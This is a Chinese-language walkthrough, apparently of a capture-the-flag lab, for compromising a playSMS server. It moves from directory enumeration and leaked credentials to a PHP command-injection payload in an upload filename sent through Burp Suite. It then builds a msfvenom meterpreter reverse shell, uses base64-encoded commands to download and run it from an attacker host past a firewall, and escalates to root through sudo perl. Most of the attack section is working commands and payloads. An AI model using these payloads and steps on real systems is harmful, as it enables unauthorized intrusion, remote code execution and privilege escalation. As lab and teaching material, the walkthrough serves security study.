命令注入:
查找一切可以浏览的页面,一定要浏览源码,可能发现密码
本例中:用dirb http://ip命令,发现robot.txt,内容如下
浏览所有页面,查看源码,发现不一样的地方,发现/nothing提示与正常的404错误不一样,于是重点观察源码
源码如下:
找到一个网站上的文件backup.zip,解压,密码可以参考刚浏览到的密码,本例为freedom
一般解压出来的mp3文件不一定是mp3文件,用file 文件名,查看文件类型,一般是文本文件
cat 这个文件,了解详细内容。具体命令如下:
发现了一个隐藏的/SecreTSMSgatwayLogin网站,用户名为:touhid,密码:diana
根据网站名称,searchsploit 查找相关漏洞说明,本例为playSMS,查看攻击方法,这步很重要,学会使用漏洞入侵方法是接下来的重点。
也可以浏览下图中的网站!
输入以下命令:
root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
1. Description
Unrestricted File Upload:
Any registered user can upload any file because of not proper Validation of file in sendfromfile.php
Code Execution using $filename
Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily but not store in any folder so our shell is useless. But if User change the file name to "mybackdoor.php" to "<?php system('uname -a'); dia();?>.php" den server check for file and set some perameter $filename="<?php system('uname -a'); dia();?>.php" , U can see code below and display $filename on page.
For More Details : www.touhidshaikh.com/blog/
接下来开始漏洞利用:
找到Send from file页面,因为只能传csv文件,新建1.csv
现在浏览器中设置代理:
启动burpsuite:proxy设置代理截断,
要出现以下界面:能看到截断的数据
把数据包发送到action->repeater
action选择repeater,在 repeater中进行修改,再提交进行攻击
详细步骤如下:
首先在浏览器中设置代理,proxy,在页面选好1.csv
开启burpsuite,设置好proxy,开启intercept on。
在页面点击上传,此时burpsuite截获数据包。点击“ACTION”,选择“Send to Repeater”
在Repeater标签下,对数据包进行修改。把filename=“<?php system('uname -a');die();?>.php”
点击“GO”,没有“GO”,点击“SEND”
在右侧的RESPONSE标签,查看返回的效果!
注意重新需要注入多条命令,要重新上传文件,重新截断,重新修改!!!!
可以试试id等其他命令
进一步如下:
查看msfvenom帮助:
msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
查看shell文件的格式如下:
root@kali:~# msfvenom --list format
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
生成反射攻击shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.10.128 lport=4444 -f elf -o /var/www/html/shell
或者:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.10.128 lport=4444 -f elf > /var/www/html/s
这是查看,发现是没有执行权限的,chmod +x添加权限
接下来思路:让靶机远程下载这个生成的shell,再执行,反射到msf
但是靶机上是开了防火墙的,这是需要会用绕过防火墙技术。
一定要掌握利用base64绕过防火墙的检测机制:
利用base64在攻击机对攻击语句进行加密,在burpsuite中添加时要用base64_decode进行解密
root@kali:~# echo "wget http://10.10.10.128/shell -O /tmp/shell" | base64
d2dldCBodHRwOi8vMTAuMTAuMTAuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwK
root@kali:~# echo "chmod 777 /tmp/shell" | base64
Y2htb2QgNzc3IC90bXAvc2hlbGwK
root@kali:~# echo "/tmp/shell" | base64
L3RtcC9zaGVsbAo=
依次把上述攻击语句用base64加密后的字符串,填入$filename中,加入时要用base64_decode进行解密,如下:
技巧:需要远程执行几次命令,建议新建几个空文件,如1.csv 2.csv 3.csv等。
每次都要开关浏览器的proxy和burpsuite的inception on/off。我做了多次,终于成功!!!
重新上传一个1.csv,截断,action选择repeater,repeater标签下:在提交时要用base64_decode()解码修改$filename内容:
filename="<?php system(base64_decode('d2dldCBodHRwOi8vMTAuMTAuMTAuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwK')); dia();?>.php"
点击Send按钮。此时不会有任何反映。
接下来进行提权:
sudo -l :找不需要root密码就可以执行的命令,发现perl
sudo perl -e "exec '/bin/sh'"
bash -i : 进入交互状态,root提示符出现